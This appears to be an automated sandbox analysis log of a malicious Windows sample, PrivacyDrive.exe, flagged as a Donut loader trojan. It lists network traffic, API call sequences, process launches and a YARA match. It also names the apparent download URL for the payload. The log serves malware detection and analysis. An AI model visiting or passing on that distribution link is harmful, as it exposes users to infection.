Source: PrivacyDrive.exe, 00000013.00000002.2000991866.000000000187B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error
Source: PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961835609.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961835609.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: chromecache_141.1.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_141.1.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_138.1.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_138.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_138.1.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.29.10:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.181:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.17:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.17:49739 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Code function: 19_2_05A682A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

19_2_05A682A0

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Code function: 19_2_05A682A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

19_2_05A682A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\il222.zip (copy)

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Code function: 19_2_0106C583 LdrInitializeThunk,NtCreateSection,NtMapViewOfSection,LdrInitializeThunk,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,LdrInitializeThunk,LdrInitializeThunk,

19_2_0106C583

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101055F	19_2_0101055F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0106C583	19_2_0106C583
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_010231C2	19_2_010231C2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_010480E2	19_2_010480E2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01048372	19_2_01048372
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101A252	19_2_0101A252
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01015292	19_2_01015292
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0105C2B2	19_2_0105C2B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0106D5C4	19_2_0106D5C4
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101C402	19_2_0101C402
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01049792	19_2_01049792
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0103D652	19_2_0103D652
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0103B99B	19_2_0103B99B
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101E802	19_2_0101E802
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_010198B2	19_2_010198B2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01030B95	19_2_01030B95
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01013A08	19_2_01013A08
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01049A42	19_2_01049A42
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101DA82	19_2_0101DA82
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101CAE2	19_2_0101CAE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01012D5B	19_2_01012D5B
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01059DB2	19_2_01059DB2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0104FCA2	19_2_0104FCA2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01012CB5	19_2_01012CB5
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101CF72	19_2_0101CF72
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01012FB3	19_2_01012FB3
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01012E1A	19_2_01012E1A
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01012E8E	19_2_01012E8E
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01016EB2	19_2_01016EB2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01018EB2	19_2_01018EB2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101BEE2	19_2_0101BEE2
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01016EFD	19_2_01016EFD
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A315B1	19_2_05A315B1
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3B570	19_2_05A3B570
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A354B0	19_2_05A354B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A374B0	19_2_05A374B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3148C	19_2_05A3148C
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3A4E0	19_2_05A3A4E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A354FB	19_2_05A354FB
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A31418	19_2_05A31418
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A417C0	19_2_05A417C0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A666E0	19_2_05A666E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A4F193	19_2_05A4F193
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3C080	19_2_05A3C080
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3B0E0	19_2_05A3B0E0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A32006	19_2_05A32006
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A68040	19_2_05A68040
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A783B0	19_2_05A783B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A31359	19_2_05A31359
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A6E2A0	19_2_05A6E2A0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A312B3	19_2_05A312B3
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A67D90	19_2_05A67D90
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A5BC50	19_2_05A5BC50
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A59F99	19_2_05A59F99
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A37EB0	19_2_05A37EB0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3CE00	19_2_05A3CE00
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A66970	19_2_05A66970
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A7A8B0	19_2_05A7A8B0
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A33890	19_2_05A33890
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A38850	19_2_05A38850
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A3AA00	19_2_05A3AA00

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: String function: 05A3EE60 appears 145 times
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: String function: 01020862 appears 145 times
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: String function: 05A3CBE0 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: String function: 0101E5E2 appears 90 times

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 1712

Source: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.evad.win@27/35@10/9

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Code function: 19_2_01010C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

19_2_01010C6F

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Code function: 19_2_05A6F006 CoCreateInstance,

19_2_05A6F006

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess364

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\01bb0c2f-2807-4565-8df3-5043d858360a

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1988,i,15395324966863303034,10377143304438437007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://finalstepgo.com/uploads/il2.txt"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe "C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 1712
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1988,i,15395324966863303034,10377143304438437007,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01052307 push ecx; retf		19_2_01052308
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_05A70905 push ecx; retf		19_2_05A70906

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
